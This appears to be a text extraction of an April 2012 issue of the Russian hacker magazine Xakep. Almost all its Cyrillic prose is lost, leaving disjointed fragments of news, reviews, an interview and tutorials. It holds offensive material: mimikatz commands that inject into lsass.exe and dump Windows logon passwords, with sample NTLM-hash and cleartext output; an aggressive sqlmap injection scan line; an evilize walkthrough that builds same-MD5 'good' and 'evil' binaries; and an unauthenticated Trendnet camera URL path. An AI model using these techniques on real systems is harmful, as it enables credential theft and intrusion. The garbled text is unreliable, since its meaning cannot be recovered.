
ANDROID

111

WWW.XAKEP.RU

04 (159) 2012

DuckDuckGo:
Google
,

TRUECRYPT

: 230 .

024

:
,
,

084

SHIM ENGINE:


056



ASP .NET

018

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(petya@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-


.: (495) 935-7034, : (495) 545-0906

-
, , , ,
. - , , .
,
!
, .
:
, -,
.

- . , ,
-.
,
, .

,
, .
nikitozz,
. .



TECHNOLOGY

(zinaidach@glc.ru)
(filatova@glc.ru)
(olgaeml@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
(polikarpova@glc.ru)

( )
(tatarenkova@glc.ru)

(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .

P.S. ,
,
, .
!

.
. ,
, . .
.

: content@glc.ru.
, , 2012

04/159/ 2012

001

Content

008

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017



Proof-of-concept
: Windows

COVERSTORY

024

COVERSTORY

018



1100
RECON SCOUT XT
:)

056

116

PCZONE
030
036

040


IT, ? !
!


Google .
10 DuckDuckGo.com

UNIXOID
102

106
111

044
050
056

060

064
068
072

Easy-Hack



ASP.NET:

ELMAH
Mail.Ru





- :
X-Tools

SYN/ACK
116
122

128

080

!
:


134
139

140
143

088
092
096
100

Shim:
Shim Engine

True-
TrueCrypt

,


WMI:



!

Edifier MP15 Plus

144

084


VDI Win2k8R2 Linux


Samba

IT- Microsoft: 2012

FERRUM

MALWARE
074


,


kobjects, sysfs, udev, udisks upower

Android-:
CyanogenMod vs MIUI

134

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS

BITTORRENT -
BitTorrent, -
, .
, ,
,
BitTorrent. , , .
,
BitTorrent Live. ,
.

. BitTorrent Live 99%. ,
, CDN, . -
live.bittorrent.com, , BitTorrent Live
.
,
. ,
Netflix Hulu.





.
,
MPAA, RIAA

,
.

,

,
, ,
,
.




,
SSL-.
HTTPS
.

004

WINDOWS 8 ,

.

.


,

.

PASTEBIN
.
31
13
DNS-.

, Anonymous,


. ,


(pastebin.com/NwN8ehFW)

,
Gmail-
.
Ars Technica
. , Xbox, PS3 iPad
. ,
() (, ,
Xbox Kinect),
.
( Xbox Live) . Ars Technica
, Microsoft , ,
-,
Xbox Live Skype.

ANDROID MARKET
.
Bouncer



.

FOXCONN
SWAGG SECURITY.
, ,
,
Apple
TPB.


01

02

03

READER@GLC.RU
.

04

MEGANEWS

vk.com.


TRENDNET
, IP-



!
GOOGLE
AUGMENTED REALITY
- ,
Google , ,
. ,
,

Wi-Fi Bluetooth. , Google, . ,

, Google . , ,
, , .
, ,
. , ,
Google - ,
Google Glasses.
New York Times,
.
: , , iPod nano.
, , Google
Heads-Up Display (HUD).
, . ,
.
, 9to5google.com ,

. ,
,
,
. , 9to5google.com :

.
HUD-. , ,
. , Android-,
NYT, .
Wi-Fi Bluetooth 4.0. ,
Google. ,
, ,
. ,
GPS , -, Android.
, ,
3D. , , ,
9to5google.com, .
. , , Android-. : , Google .

Trendnet , 2010

26
,

,

.

Trendnet
.
. 1.1.0 (build 104)
,
Trendnet
IP-: IP-
15 ,
. .
( ), /anony/mjpg.cgi,
. , :
http://192.168.1.3/anony/mjpg.cgi, ,
IP- 192.168.1.3.
, , Pastebin
1 000 IP-, Reddit.
IP-
shodanhq.com, .
[netcam].

GROUP-IB



2011

HOSTING MEDIA.
006


MEGANEWS

20 ( ) Google Chrome 17.0.963.46.

SYMANTEC ,

ANDROID-

. Recon Robotics, .
, 31
1 100
Recon Scout XT. 13.9
. ,
Recon Scout XT
.
,

,
Recon Robotics. , 315
, .
-? Recon
Scout XT
,
.
36 .
Recon Scout XT .

(youtu.be/5fzi7fxknIc)!
, Recon Scout XT , .

Symantec
RootSmart,

.
Android Market , ,
. RootSmart
,
IMEI, IMSI, ID , location area code
.
RootSmart Ginger Master,
Gingerbreak. , , RootSmart
root-, Gingerbreak . Root-
shells.zip
.

Droid Live,

.
, , , .
,
1 600 9 000 .

110-140 .



C&C-. ,

2011 .

WEXLER.BOOK T7007
ANDROID 2.3

WEXLER.BOOK T7007, Android 2.3. : 7"
LED- Multi-Touch,
ARM9, c 1,2
Wi-Fi (IEEE 802.11
b/g/n) 150 M/.
3700 .

008

8 ,
32
MicroSD. WEXLER.BOOK T7007
G-, USB- (USB OTG).
.

4999 .


MEGANEWS

BUG BOUNTY: Google 410 . .



( ,
)

Virtual Human Interaction Lab (vhil.stanford.edu).
,
, . , ,
, .
Knowledge Stream (knowledgestream.ru).
, . , ,
,
.
HD- .


. 20-
,
,
,
.
:
,
, Skype,
.
, ,
, .
, , , . ,
, ,
, ,
, 90%.

, .
. , ,
, , ,

(
) , ,
,
.
, Knowledge
Stream
. ,
- Electronic
Frontier Foundation, ,
. ,
.

Knowledge Stream
2011

Digital October. Knowledge
Stream
,
.

!

-
.

.

- !

010

,
! ,
!

2011
,
: 4 ,
0,4 , CO 5 .


#hacker tweets
@n00bznet:

./sqlmap.py -u http://url/ --crawl=5


--level=5 --risk=3 --threads=10 <~
,
!
:

, sqlmap
SQLi-.

@ChrisJohnRiley:



:)

@FirefoxNightly:

ASLR
dll- ( )
-ASLR
http://t.co/IQFdZrZ4
:

Firefox, ...

@pa_kt:

CVE-2011-2371
(Firefox reduceRight) -ASLR :
http://t.co/3uNU3Jjj

@RomiSphinX:

: ,
, -
. ()
<3
:

(.
Richard Phillips Feynman; 11 1918 15
1988) .
.
. 19431945
.

:
:

, ,
,
...

@corelanc0d3r:


, , :)

... !

Firefox DEP ASLR.
ASLR ROP
-ASLR ,
dll
ROP- dll.

@mathias:

JavaScript: try { x; }
catch( _
_ ) { console.
log('CODE, Y U NO WORK '); }
http://t.co/RTJaNUij
:

@FreedomCoder:

.
...

-
JavaScript.
,
:)

@geovedi:

,
- ,
.

@clarkysj:

, 5 , 18 -
6 - ,
.
, .

@thealuc:

,
-: >(tee
-a ~/.bash_history | logger -t $USER[$$]
$SSH_CONNECTION)


@daveaitel:
@joshcorman:

: White
Paper
-
---.

@f1nux:

, ...
, SSL.
. ...
:

, SSL ,
. ,
,
.

WP ftw!
SYSTEM
( )
?
! Symantec pcAnywhere
12.5 .

@i0n1c:

80
, , ,

- .

@evacide:

011

MICROSOFT STORE EVIL SHADOW TEAM. , .

MEGANEWS

ANONYMOUS

QR-



Sonic
Experiences,
,

iPhone
Android.


QR-, . , , .
, , ,
- , ,
. Sonic Notify (sonicnotify.com), , ,
QR-. .
, iOS Android
. , Sonic Notify
. ,
, .
, ,
, ,

. , , , . ,
- ,
:).



220 000

.

012

15 YOTA LTE,

2500-2530 2620-2650
. WiMAX LTE
14 15
.



:


.


Anonymous, , ,
.
. ,
-
-. --, -
!
Anonymous ,
. YouTube,
: youtu.be/pl3spwzUZfQ.

- ,
(pastebin.com/8G4jLha8).
, .
- , .
,
.


MEGAUPLOAD, 19 ,

2-3%,
DeepField Networks.

DDOS-

NASDAQ,
BATS
LONGwave99.
99%.


MAC OS X 10.8 Mountain Lion ( ) 2012 .

RAPIDSHARE

GOOGLEWALLET

PIN

egaUpload , ,
RapidShare .
RIAA MPAA,
.
- , TorrentFreak
.
:
RapidShare
, .
anti-abuse department.
, , , RapidShare.
,
. ,
. , , .
2010 , Dutko,
RapidShare. Dutko
RapidShare.
. , ,
.

Google Wallet
2011 .
Android-, NFC.
.
Google Wallet

. , .
,
.
.

. Google , Google
Wallet , , Secure Element,
. , Google Wallet
.
, , ,
, .
, PIN-
, Google!
.
, zveloLABS,
sqlite3, Google Wallet . metadata. ,
.
gmad_bytes_are_fun

.
, , .
deviceInfo,
, .
Protocol Buffers. .
,
message format .proto (Protocol Buffer Basics: Java).
.proto,
. Unique
User IDs (UUID), Google (GAIA)
Cloud to Device Messaging (C2DM, -),
Google Wallet Setup, TSA (,
Trusted Services), SE,
Card Production Lifecycle (CPLC) PIN-!
PIN-
SHA256. PIN- ( ),
10 000 SHA256,
. PIN-
,
,
Google Wallet .
zveloLABS , Google
. ,
, :
youtu.be/P655GXnE_ic.

RapidShare
:



Dropbox',

,

.

VLC
2.0 TWOFLOWER.
:


BLU-RAY .

MEGANEWS

GOOGLE CHROME BETA ANDROID 4- . , flash.

SSL

TWITTER
BLOGGER

Google

SSL-

Chrome.

,
.

, Twitter ,
,
. Twitter.
, , ,
. ,
Twitter ,
. ,
. ,
, Anonymous. Twitter .
, ( )
, ,
.

. -
.
Google
, , Blogger,
. , Google
.

SSL .
Trustwave
.
Bugzilla, mozilla.dev.security.policy.

, .
,
, man-in-the-middle
SSL/TLS.
Mozilla ,
Firefox
Mozilla,
HSM.
27 . , Mozilla
.

WOLFRAM ALPHA
,

,
. Wolfram Alpha
Pro. Pro-
4,99$
(2,99$ ),


14 .

014

OCCASIONAL
GAMER,

Windows Phone 7 (55%) HTC.
Samsung (28%), LG (12%)
Nokia (4%).

INTEL Core i5-2380P, i52450P i5-2550K Sandy Bridge.



GPU.



THE PIRATE BAY


, ,
.

, . .

, .

2008 .
, , ( , ).
, The Pirate Bay .
, 2010 ,
4, 8 10 , 46 (
6,8 ). , ,
, .
,
( ,
) TPB , . ,
. ThePirateBay.org
, ,
( ,
,
), .
, .SE, .
, .
TPB
magnet- torrent-.
, torrent- (,
, - , ), . ,
.
torrentfreak.com :
, 164
, 90 ! , . , ,
- .
, The Promo Bay.
(, ,
) ,
The Pirate Bay. ,
SOPA ,
, P2P. , ,
, , .
.


HEADER


, .
.
. ,
(
), .
. ,
,
, , . :
-

- ? ,
- :
-
Ubuntu

.
Vagrant
(vagrantup.com).


Oracle's
VirtualBox (4.0.x 4.1.x), Vagrant

.
,
. downloads.vagrantup.com
( Windows, Linux, Mac OS X)
(
):
$ vagrant box add lucid32 http://files.vagrantup.com/lucid32.box
$ vagrant init lucid32
$ vagrant up


(,
, VirtualBox)! ,

016

box add < >


.

box- ,
.
, : Vagrant
.
init ,

: 32-
Ubuntu Lucid (10.04).
512 .
vagrant up
.
.
Vagrant. :

Vagrant

vagrant suspend

,
:
vagrant status

SSH, Vagrant:

vagrantbox.es

vagrant ssh

,
.
(,
IP),
Vagrantfile, Ruby.
, ,
. , ,
box-, .

Ruby


Proof-of-Concept

WINDOWS
,
.
? !
?

,
Windows-. Windows Credentials Editor
. mimikatz
(blog.gentilkiwi.com/mimikatz). ,
... .
, , . , ,
.
,
(
). :

mimikatz. ,
: ,
:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

mimikatz 1.0 x86 (pre-alpha)

/* Traitement du Kiwi */

mimikatz # privilege::debug
Demande d'ACTIVATION du privilge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donnes de scurits dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package d'authentification : NTLM
Utilisateur principal : Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password
tspkg : password

mimikatz


: , ?
, . wdigest (technet.microsoft.com/en-us/library/cc778868(WS.10).aspx),
, , HTTP Digest Authentication
, ( ). ,
WCE. z

017

COVERSTORY

Sanjar Satsura (sanjar@xakep.ru, twitter.com/sanjar_satsura)

IT-


.
Stuxnet, ,


. .

018


DVD

WARNING

,
,


.


. ,



,

.


COVERSTORY


? , . , ,
, .
kernel.org: ,
, .
,
-, MD4, MD5 SHA-1.

( ). -. , , - ,
!

- ,
(). -
, - ,
. ? , .

, - F
x y , F(x) = F(y).
- F(x) = x|19|, . ( ,
) 19 ( 19),
. ,
. ?
-, 38, -
. F(x)
19, y y+19

-,


(/)

Davies-Meyer (c IDEA)    128    22
Davies-Meyer (c DES)     64
                         256    11
HAVAL (3 )                      168
HAVAL (4 )                      118
HAVAL (5 )                      95
MD2                      128    23
MD4                      128    236
MD5                      128    174
N- (12 )                 128    29
N- (15 )                 128    24
RIPE-MD                  128    182
SHA                      160    75
Snefru (4 )              128    48
Snefru (8 )              128    23

-,

020

-, y. , 38
- 57, 76 .
, (38,57), (38,76)
- F(x).
- F ,
,
- .
1. : - m
x,
F(x)=m.
2. :
m n, F(n) = F(m).
3. : , .

(,
, ).
- CRC, -,
.
, -,
.

. ( 32 ) ,
( : 128, 160 256 ),
.
C, CRC- 100 000 :
#include <stdio.h>
#include <stdlib.h>

#define ITERATIONS 100000

int main(void) {
    int count = 0;          /* number of colliding pairs found */
    int i, j;
    unsigned hash;
    char c;
    unsigned *table;

    table = calloc(ITERATIONS, sizeof(unsigned));
    if (table == NULL) return 1;
    for (i = 0; i < ITERATIONS; i++) {
        /* hash a random 32-character string of printable ASCII */
        hash = 0;
        for (j = 0; j < 32; j++) {
            c = 33 + (char)(63.0 * rand() / (RAND_MAX + 1.0));
            hash = (hash * 33) + c;
        }
        hash = hash + (hash >> 5);
        /* compare against every hash computed so far */
        for (j = 0; j < i; j++)
            if (table[j] == hash) count++;
        table[i] = hash;
    }
    free(table);
    printf("%d values %d collisions\n", ITERATIONS, count);
    return 0;
}

- , -
. ,


IV , L1 L2 . ,
A = 0x12AC2375
B = 0x3B341042
C = 0x5F62B97C
D = 0x4BA763ED


AA1DDABE
1006363E
98A1FB19
1326ED65

D97ABFF5
7218209D
1FAE44B0
D93E0972

BBF0E1C1
E01C136D
236BB992
D458C868

32774244
9DA64D0E
6B7A779B
6B72746A

2^9 32-
,
. ,
( ).

VeriSign

: MD4 MD5.
MD5 ,
MD4.
.
,
.
, F .
G = XZ v (Y not(Z)) ( XY v XZ v YZ). , -
.
2 3. ( :
ASCII 5 0x35 (base 16) = 000110101 (base 2)
4 0x34 (base 16) = 000110100 (base 2))
. .
128- (16-) MD5-:
MD5("md5") = 1bc29b36f623ba82aaf6724fd3b16718

, MD5,
(F)
. , , ,
, . C
: MD5(IV,L1) = MD5(IV,L2),


,
. ,
/ -. , , ,
,
.
MD4/5, .
1. :
, ,
.
2. :
,
.
3. RainbowCrack:
;
,
, .
, , : PasswordsPro,
MD5BFCPF, John the Ripper.
WWW

STUXNET
, Stuxnet,
- ,

? -
,

JMicron Realtek. ,
.
Stuxnet
Duqu. C-Media Electronics, .
, ! ,
, .

. , ,
,


:). ,
, . -,
,
(
orr,
-, -:
woodman openrce),
. Duqu,
(c )
. -,
( , Duqu) ,
, ,
15 ! , ,
.
,
-.

MD5:
bit.ly/awBxKK;


():
bit.ly/byRrQu;
MD5 Collision
Generator:
bit.ly/zLR5Ec;
Evilize:
bit.ly/zEBLmj;
Rainbow MD5 Crack
by Collision Search:
bit.ly/yYRUxl;

MD5:
bit.ly/yDQNuY;
HashClash Framework:
bit.ly/722ob;


:
bit.ly/ztdpHg.

021

COVERSTORY


, .

,
.
1. CR2-KK , .
2. CR1-KK .
3. CR0 .

:
1. CR2-KK .
2. CR1-KK ,
.
3. 0 .

. HEX (
-
), hex-
:
1-

hello-erase.c, .
,
goodevil.o:
gcc hello-erase.c goodevil.o -o hello-erase

d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70

2-
d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70

MD5 , !
. MD5
Collision Generator
CR2-KK. .
15 ,
! , .
, - evilize (
). : evilize, md5coll
goodevil.o. -

:
md5sum ./hello-erase
23d3e4873e3ea619c7bdd6fa2d0271e7 /home/satsura/md5coll/source/evilize/hello-erase

, MD5-:
./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > \
init.txt

evilize MD5-.
,
:
./evilize hello-erase -c init.txt -g good -e evil
du -sh ./evil ./good & md5sum ./evil ./good
8,0K ./evil
8,0K ./good
d8bf211b61624d331fe06c75bd6e3c89 ./evil
d8bf211b61624d331fe06c75bd6e3c89 ./good

MD5,
, .

1996

022


(Wang Xiaoyun), (Feng Dengguo),
(Lai Xuejia) (Yu Hongbo)
,
(1 IBM p690).

2004


,
128 ,
MD5-.

2005


./good
Hello, world!
./evil
This program is evil!!!
Erasing hard drive...1Gb...2Gb... just kidding!
Nothing was erased.

, Hello, world!,
. hello-erase.c ,
,
.
, CR1-KK.

CR1-KK

Unicon, (- ) . ,
CR1-KK-collision keygen ,


- .
, . , : 000000.

.
,
, CRM- ( , E-hujjat
).
, :
C:\coll_test> md5sum *
b2d1a3f63f9784e0fe8c237ff2484a78 *key((faked by collision).key
a654bd700b5e6cf47ca0b042b2f30575 *cer(faked by collision).cer
c5d6aaa28639316614e3d95987fcb612 *pfx(faked by collision).pfx
a654bd700b5e6cf47ca0b042b2f30575 *cer.cer

, cer.cer cer(faked by collision).cer


.

, MD5- . . ,
-. , ,
. :
, .
, 128-
.
, MD2, MD4, MD5, DES, DES-IDEA, RIPEMD, HAVAL(~128, ~256), SHA-1, 34.10-2001 .
. z


,


(A,B,C,D) ,
.

2006





, MD5-.

2007


evilize

(Authenticode digital signature), authenticode
Microsoft
.

2009

023

COVER STORY
.

.
Wi-Fi
VPN Windows.
,
Almaz Capital Partners,
, .


.

. .
, .

, ,
.
.
. ,
, ,
, .
.
, , , .
,
. , :
.
, ,

. , ,
. 1972 !
, , ,
.
, ,
: . .
:

... , ,
,
,
, .

. ,
, , ,

024

.
... .
.
, ,
.

:
. ,
:
, , ,
,

.
, . , , .
,
,
. ,
.
,
,
.
, , , :
, ,

. , 10%
,
.
: , .
, :
, , ,
... ,
. ,

, . - -

, .
, -.

SUN
Sun
Microsystems 1990 .
, . ,

,
, .

,
.
,

. -
. -
,
. - .
22- ,
.
- 8 ,
, 22 !
,

.
: ,
. ,
,
.
, Sun
, SPARC-
.
, Sun . 1990
,
.
, -...
,
Sun . ,
SPARC ?
SPARC , ! Intel
, SPARC .
, : , .
, , .
: ? :).
1991 ,
-
.
. ,
,
, ,




30

Almaz Capital Partners,
Parallels, Alawar, Alter Geo

COVER STORY
, . :).
-
, .
Sun
. IBM, HP...
: , ,
. , Sun,
.
, - ,
... : ,
,
! - IBM HP. .
Sun 15
, 25
000 . ?
. .


,
. :
,
.
... .
.

WI-FI
80- IP . Unix- ,
IP-
. ,
PDP DEC, , ,
.

,
.
. .
Sun. : 802.11,
,
PCMCIA-?. ,
...
802.11 , , . Internet Engineering
Task Force. , , -
. Wi-Fi ,
. , .
Motorola, ,
. : Sun
. , - ,
.
. Sun ,
.
-.

026

1993 PCMCIA- Wi-Fi, 4 /c. Interop .


Wi-Fi
! , . Sun
,
Ericsson,

. Ericsson HP LX
, .
. , ,
--, . 19.2
/ .

. :
? .
!, CEO Ericsson,
2003-2004 .
Sun
. -
, .
Solaris ,
. ,
,
. ,
, , .


90- ,
,
, - ,
, . ,
. .
VPN,
, .
,
+, (
) .
Sun,
.
. ,
- Microsoft
- 90- .
.
: , -
-....
, ,
.
: - , ,
.
,
, .

. - , :
, .


,
(, ,
- ). ,
, ,
. ,

,
,
. .
.
, - , . ,
, VPN,
,
. , Sun Windows
: , , Windows!.
NDIS-,
Microsoft . ,
, , VPN.
Sun Screen E+
.



. ,
- , - ,
.
, .
.
,
, ,
,
- .
,
... ,

20 30 .
,
, , , ,
, 40-50
:). , ,
, . 1000%,
Google - ,
5-, 10- .


( repeated entrepreneurs),

, . ,


,
, , ,
.
,
,
.
Almaz 2
- ,
.
, - . -
,

. .
,

.
,
. ,
. . ,
.

... ,
.
, ,
...
, .

?
,
. , .
, - , .
. , ,
,
. ,
, ... .
, ,
. ,
.


WI-FI
,


.
. , e-commerce,

. - ,
( ,
) , .

e-commerce ,
- .
.
,
, .

, -
.
:
, . : ,
.
(
, ),


, , ,
. : , , ,
, , .
-.
. - . , , -
-,
, .

, ,
. , : ,
: ,


.
, , .
, -

, .
- ,
: - , , ,
,
. : ,
, ,
- .
, ,
.
, .
Google... , , Microsoft IBM.
,
: Apple, Google, Facebook
Amazon. , Microsoft.
,
.
, , ,
, .
, . ,
. , ,
,
.
:
. ,
. -
,
.
CEO, ( , )
.
. .
. ,
, ,
.
: , ? ,
, ?
-
, - .
?
?.
: , .

HR ,
, ,
. .
, ,
, ( ),
, ,
.



, ,

.
.

027

COVER STORY
. ,
.
.
.
.
.
Google. 2009 2010 ,
42 .
400 .
... ,
25 . , -
, - . . 10-30. 2-3
. ,
25
3, 8-10 . 10 ,
,
30% .
300 3 ,
. 300 ,
, . , . , .
.
, .
go global,
( Parallels, ,
) . ,
, , -,
,
,
, . -,
.
,
. , ,
. ,
: , -
- , - .
. .
,
(Famatech
RAdmin, ,
),


. , , ,
,
. .
IT- ,
. .
,
1 10
.
.
.
, , , ,
. , ,
JetBrains ,
. , ,
40-60
, . ,
.
,
.

,
. ,
.
, ...
, .
? , , , -
.
... .
, ,
.
-.
,
.
, ,
.

. , . ,
, .
OpenFlow,



CRAZY

,

.

028



.
!


,

20-30% ,
.

Software-Defined Networking.

.
, .
,
.
,
,
.
.

. , ,
.
, . ,
. ,
,
,
,
.
, : .
, ,
, (
),
.
.

. ,
, :
,
-. , . ,
. ,
,
,

. , ,
! , , ,
,
.
,
, .
,
. -
,
, : ,
, , .
.

, , .
- ,
, - ,
. , ,
.
. , ,
,
. , .

. z


Preview

30 .
.

PCZONE
30


.
,

,

.

,


.
-,
,
.

PC ZONE

36

!

Windows- Linux
? ,
WinSwitch.

60

MAIL.RU

. ,
,
.


40

GOOGLE ,
Google .

DuckDuckGo,
.

56


ASP.
NET ,
web-,
. .

MALWARE

74



.
.

80



,
.

029

PC ZONE


IT,
? !

. .
IT,
.
, ,
-.
,
, .
IT .
030

,

.
.

. , , ,
, .
, .
, .



,
.
, ,
,
, .
, : -
IT-
,

. .

. .
.
, ,
:).

,

. ,
,
, .

, ,
.

LINGUALEO

TED.com),
(
) .
,
. ,
. ,

. ?
, LinguaLeo

,
.
,

.
, -,
, -,
. ,
,
.

, , -
. , ,
.
, ,

,
.


(, iTunes),
.

, .

(ai-class.com),
(db-class.org).
, .

PDF-,
. ,
, :
(securityclass.org);

(security-class.org);
(cs101-class.org);
(cs101-class.org);

(cs101-class.org);
,

( ).
.
,
, , ,
. ,

, - . , ,

.

,
6.002x:
.
. ,
,
, . -

,
Scheme
Structure and Interpretation of
Computer Programs. . ,
, .

: ,
. . :

, -,
. - ,
, ...
,
LinguaLeo.ru, .
,
,
(, -

, , .

, ,
.
,
.
,
,
-.
:
(ml-class.org), -

MITX

MIT .
MITx
-. -


PC ZONE

JavaScript
,
,
.
: ,
. -

: Python, Ruby ( Ruby on Rails)


, , JavaScript (HTML5). .
-

JS,

.
JavaScript :
,

Linux (bellard.org/jslinux).
:).

CODECADEMY

.

, , ,
,
.
,
- .
, , JavaScript.
,
.

.

Codecademy.
UGC (User-generated content)

.

www.codecademy.com
:
? .
.
, .
, 21 ,
.
Codecademy ,
.

( !) ,
JavaScript.

JQUERY

learnjquery.tutsplus.com
JavaScript
jQuery,
HTML-, ,
AJAX.
jQuery
JavaScript. .
,

JQUERY
codeschool.com/courses/jquery-air-first-fligh
,
, -
c<>de school.
,
,
. jQuery
Air: First Flight ,
.
, -

032

Nettuts+, ,
.
-
, .
,
. :
,

. ,
JS,
(bit.ly/AqK4s0).


, .
(, 350 ). -
, , .
JavaScript, ,
CSS-,
HTML- DOM,
.
,
.


Ruby Ruby on Rails



, ,
,
Ruby on Rails.
,
-,

. ,
.
,
, Ruby Ruby on Rails
.
.

RUBYMONK

.

( , , ,

).
, . ,
,
, ,
.

rubymonk.com

, ,

Ruby. :
. .
- ,
.
,

TRY RUBY
tryruby.org
- ,

Ruby
, . ,

THE INTRO TO RAILS SCREENCAST I


WISH I HAD
bit.ly/zqLVPH
, Ruby
- Ruby On
Rails.
,
Twitter.
tutsplus.com

RAILS FOR ZOMBIES


railsforzombies.org
( !)
Rails
-,
c<>de school.


, ,
. Ruby
:
,
Metasploit ( ) Ruby.

, try ruby . ,
, ,
.

. ,

c<>de school. .


Rails, . 40-
, Rails.
Models, TDD, ActiveRecord,
RSpec, Capybara, Partials
.
:

railscasts.com.

,
, ,
,

.
, Rails
for Zombies 2,
.

033

PC ZONE

Python
Python

.
.
Python

PYTHON!
trypython.org
- Python.
JS Ruby, ,
,
.

- PYTHON
onlinepythontutor.com


.
, ,
Python,
(-) -

PYTHON GOOGLE
code.google.com/edu/languages/googlepython-class/index.html
Google , Python.
,
, (,


. ,
:
, Python,
.
:

, -
,
.
, Python
,
.

.
:
.
: Try
Python ,

. ( Python
IronPython). ,
Silverlight.


(, ,
). ,
, ,
Python MIT.
, ,
. .
-,

-

, I/O- . ,
.

).
.
, ,

.
Python (
),
, ,
HTTP-. ,

Google
.

!
,
,
, .
,
,
, ,

034

,

NoSQL
.
Haskell: tryhaskell.org;
Scala: simplyscala.com;

Erlang: tryerlang.org;
Clojure: try-clojure.org;
MongoDb: try.mongodb.org;
RedisDb: try.redis-db.com;
C#: bit.ly/A4HR9m;
SQL: sql-ex.ru.


PC ZONE

Ant (zhukov.a@real.xakep.ru)

!
- .
.
-

. WinSwitch
.

WINSWITCH?
,
, , ( ). ,
Ubuntu,
Windows Ubuntu.
, ,
. - , ,

. RDP VNC
, ,
.
,
?
? ,
. WinSwitch!
? - ,
, .
, , . ,
Microsoft Word , ,
Visual Studio ,
. ,

036

, .
: Windows
Ubuntu,
(
). Visual Studio.
, .

, , , WinSwitch . , Ubuntu Natty Narwhal


(11.04) Windows XP.
Windows. :
winswitch.org , .
mDNS-
( mDNS )
( , , ),
.
Linux. , ,
Ubuntu, , ,
. ,
:
sudo su
wget -O - https://winswitch.org/gpg.asc | apt-key add -
echo "deb http://winswitch.org/ natty main" > /etc/apt/sources.list.d/winswitch.list
apt-get update
apt-get install winswitch

WinSwitch

ant-vb

. , , listen_on, ,
. , ,
,
listen_on="*:32123" ( ,
32123
).
allow_root_logins,
False. ,
/ . allow_root_authentication
, . . mDNS
settings / mDNS,

,
,
.

WinSwitch : ( ). ,

. ,
.

mDNS.
,
.
,
. ,
. *nix ~/.winswitch/server/server.conf, Windows *\Application Data\Window-Switch\server\server.conf. . , ,
:
# Identity
ID="8796747538515"
name="testpc"
type="workstation"

. ,


WinSwitch

037

PC ZONE

Ubuntu VNC

, ""

,
.
mDNS_publish False,

.
, , ,
mDNS_publish_username. , , - .

,
.

-
- .
. Windows XP.
Window-Switch. ,
. . Ubuntu.
Internet WindowSwitch.
, . , , testpc ID=8796747538515.
, ,
user.

, , ant-vb
ant .

. , WinSwitch
Start Application Games Mines. ( ), .
, Mines Send to user on testpc.
. ,
. !
, WinSwitch , ,
. ,
Start Application Custom Command.
,
,
Open in Window Switch. ,
(Main Unix Display
VNC Copy).
( GStreamer).

,
. ,
, . , , , .

MDNS?
Multicast DNS (mDNS)

DNS ,
DNS-.
, mDNS
IP-
DNS. ,
, mDNS.
,

038

.

mDNS-
/.
(,
)
response- TTL = 0. mDNS
.local.
mDNS
Bonjour (Apple)
Avahi (Linux).


Avahi-

, Windows-

Windows- - Ubuntu

, .
. .
: *\Application Data\Window-Switch\
client\applet.log. ,
- . , .
, . , : ,
--debug-mode. ,
(C:\Program Files\WinSwitch) :
Switch-Server.exe --debug-mode

,
. , ,
Linux-. . :
winswitch_server --debug-mode

:
[EE] 2012/23/02 19:13:18 WinSwitchServer.check() running as root (uid=0) is currently broken

.
, (
). ,
.
.
, [DD] ( ). ,
. , - ,
traceback. ,
:
AvahiPublisher.__init__(Window Switch for ant on ant-vb,32123,_shifter._tcp.,,,['username=ant', 'ssh_tunnel=False', 'version=0.12.11', 'ID=8796747971533'],-1)


. Avahi , .
,
, , .
Mac OS X (Rendezvous, Bonjour)
. Avahi mDNS flexmdns.
mDNS, mDNS ,
. , Avahi .
, , :
avahi-daemon

Service ant-vb (/services/udisks.service) successfully


established , avahi .
? WinSwitch .
mDNS .
- ,
~/.winswitch/client/applet.log.
,
mDNS. .
mDNS , avahi,
. ,
, ,
. ! .

?
WinSwitch
, . ,
, , ,

( ,
). ,
WinSwitch Direct Input,

. z

039

PC ZONE

Mifrill (mifrill@real.xakep.ru)

GOOGLE

.

10
DUCKDUCKGO.COM

? Google
? , ,
-
Bing?

,
,

,
.
DuckDuckGo.com.

040

?
. -
Google. DuckDuckGo
, , ,
(
)
privacy: DuckDuckGo , .
,
.

.
, Google
,

.
.

.
